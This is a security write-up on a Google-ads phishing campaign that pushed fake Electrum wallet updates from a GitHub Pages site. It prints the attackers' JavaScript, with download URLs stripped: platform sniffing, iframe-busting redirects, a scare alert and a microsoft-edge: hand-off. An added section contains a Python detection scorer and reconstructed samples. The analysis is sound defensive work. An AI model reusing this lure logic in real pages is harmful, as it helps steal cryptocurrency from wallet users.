Electrum Malware Campaign

Write-up on a new malware campaign targeting users of Electrum, a Bitcoin wallet, which emerged primarily on February 22nd.


The main method of targeting users appears to be a malicious Google Ads campaign. The main site where users report encountering it is Reddit, as seen in the Reddit thread posted about it. The ad appears to execute JS that shows an alert telling users to update Electrum and then triggers an executable download by opening another browser (how this is done is covered in the HTML code review below). The alert's content, as quoted in the Reddit thread, is:

Electrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.

However, the thread is especially useful because the pasted text includes the origin of the iframe (URL escaped):

An embedded page at electrum-4[dot]github[dot]io says:

The site

As is apparent from the site's URL, it is a GitHub Pages site. GitHub Pages is a feature of GitHub, a public Git hosting provider (among other services and features), that lets users easily host their repositories online under a “[username]” subdomain.

The GitHub user

Because it is GitHub Pages, the repository may be public, but that depends on how the user set it up. In this instance, by looking at the user’s page, found by simply plugging the “[username]” from the GitHub Pages subdomain into GitHub, we can see the repository is open source and public.

The site’s source


The index page has a simple user interface: a loading animation. We are more interested in the JS running in the background. It is quite small; here is the entire source:

if (navigator.userAgent.indexOf('Mac OS') != -1) {
	// Mac OS visitor: break out of the ad iframe and navigate the top window to the .dmg download (URL stripped in this write-up)
	top.location.href = '';
} else {
	// Everyone else: same, but to the .exe download (URL stripped)
	top.location.href = '';
}

// After 7 seconds, send the browser on to the official Electrum site (URL stripped)
setTimeout(function () {
	window.location.href = "";
}, 7000);

A small step-by-step analysis:

  • Detect if the website is being run on a Mac OS device:
    • If so: download a .dmg file
    • If not: download a .exe file
  • After 7 seconds redirect to the official Electrum site


I am pretty sure this is the HTML that was inside the iframe that ran. It is very similar in concept to the index.html, but without the UI and with different download methods.

The JavaScript (run via a script tag):

if (navigator && (navigator.userAgent.indexOf("Windows") > -1)) {
	// Windows visitor: show a fake update warning, then hand off to Microsoft Edge through its protocol handler (target URL stripped in this write-up)
	alert("\n\nElectrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.\n\n");
	location.href = 'microsoft-edge:';
} else if (navigator && (navigator.userAgent.indexOf("Mac OS") > -1)) {
	// Mac OS visitor: same warning in a prompt, asking the user to paste a URL into their own browser (default value stripped)
	prompt("\n\nElectrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.\n\nCopy the following URL and paste it to your browser address bar:\n", "");
}

Another small step-by-step analysis:

  • If on Windows:
    • Alert the user to trick them into downloading and running the malicious executable
    • Try to download it by opening Microsoft Edge with a link to the main index page
  • Else, if on Mac OS:
    • Show a prompt to try to get the user to open the main index page in their browser
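As an added defensive example (not code from the original write-up), a small Python scorer that flags scripts like the two dissected above by the combination of indicators they share: platform sniffing, frame-busting via top.location, the microsoft-edge: hand-off, a scare dialog, a raw GitHub binary link and a delayed redirect. The sample scripts it runs on are constructed reproductions; the labels, weights, threshold and the EXAMPLE-USER / EXAMPLE-REPO / OFFICIAL-SITE.example values are placeholders chosen here, not from the campaign.

```python
import re

# Heuristics derived from the two scripts dissected above. Each entry is
# (label, regex, weight); labels and weights are chosen for this example.
INDICATORS = [
    ("ua_sniff",          r"navigator\.userAgent\.indexOf\(\s*['\"](Windows|Mac OS)['\"]", 1),
    ("frame_bust",        r"\btop\.location\.href\s*=", 2),
    ("edge_handoff",      r"['\"]microsoft-edge:", 3),
    ("scare_dialog",      r"\b(alert|prompt)\([^)]*(update|vulnerab)", 2),
    ("raw_github_binary", r"raw\.githubusercontent\.com/[^/'\"]+/[^/'\"]+/[^'\"]*\.(exe|dmg)", 3),
    ("delayed_redirect",  r"setTimeout\([\s\S]{0,200}location\.href", 1),
]
SUSPICIOUS_AT = 4  # threshold chosen for this example

def score_script(js: str) -> dict:
    """Return which indicators fire on a script body and a weighted score."""
    hits = [label for label, pat, _ in INDICATORS if re.search(pat, js, re.I)]
    score = sum(w for label, _, w in INDICATORS if label in hits)
    return {"hits": hits, "score": score, "suspicious": score >= SUSPICIOUS_AT}

# Constructed reproductions of the two scripts (the write-up stripped the real
# URLs; EXAMPLE-USER, EXAMPLE-REPO and OFFICIAL-SITE.example are placeholders).
IFRAME_JS = """
if (navigator && (navigator.userAgent.indexOf("Windows") > -1)) {
    alert("Electrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.");
    location.href = 'microsoft-edge:https://EXAMPLE-USER.github.io/';
} else if (navigator && (navigator.userAgent.indexOf("Mac OS") > -1)) {
    prompt("Please update Electrum. Copy the following URL:", "https://EXAMPLE-USER.github.io/");
}
"""
INDEX_JS = """
if (navigator.userAgent.indexOf('Mac OS') != -1) {
    top.location.href = 'https://raw.githubusercontent.com/EXAMPLE-USER/EXAMPLE-REPO/main/electrum.dmg';
} else {
    top.location.href = 'https://raw.githubusercontent.com/EXAMPLE-USER/EXAMPLE-REPO/main/electrum.exe';
}
setTimeout(function () { window.location.href = "https://OFFICIAL-SITE.example/"; }, 7000);
"""
# A benign script that also sniffs the platform, to show the score stays low.
BENIGN_JS = """
var isMac = navigator.userAgent.indexOf('Mac OS') != -1;
document.getElementById('dl').textContent = isMac ? 'Download for macOS' : 'Download for Windows';
"""

if __name__ == "__main__":
    for name, body in [("iframe", IFRAME_JS), ("index", INDEX_JS), ("benign", BENIGN_JS)]:
        print(name, score_script(body))
```

Platform sniffing alone scores below the threshold on purpose, since legitimate download pages do it too; it is the combination with a protocol-handler hand-off or a raw-hosted binary that is worth alerting on.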

The binaries

The binaries are stored in another GitHub repo under the same user (electrum-4/electrum), as the JS on the site uses a raw GitHub URL (a way of accessing a file in a GitHub repo directly via a URL) to download them. I will not go into the actual binaries here as I am not experienced with that side.

Final Notes

I have contacted GitHub with a link to this write-up to attempt to get the user / repos taken down to prevent further users from being attacked. Thanks.

Trivia / Extra Info

  • Whilst the GitHub Pages repo's commits are made by the GitHub user, the actual repo with the binaries has commits authored by root <root@vps.server.local>

Update (18:20 UTC)

GitHub has now taken the user down, resulting in the binaries no longer being hosted and the GitHub Pages site now no longer being online, meaning no new users can be attacked.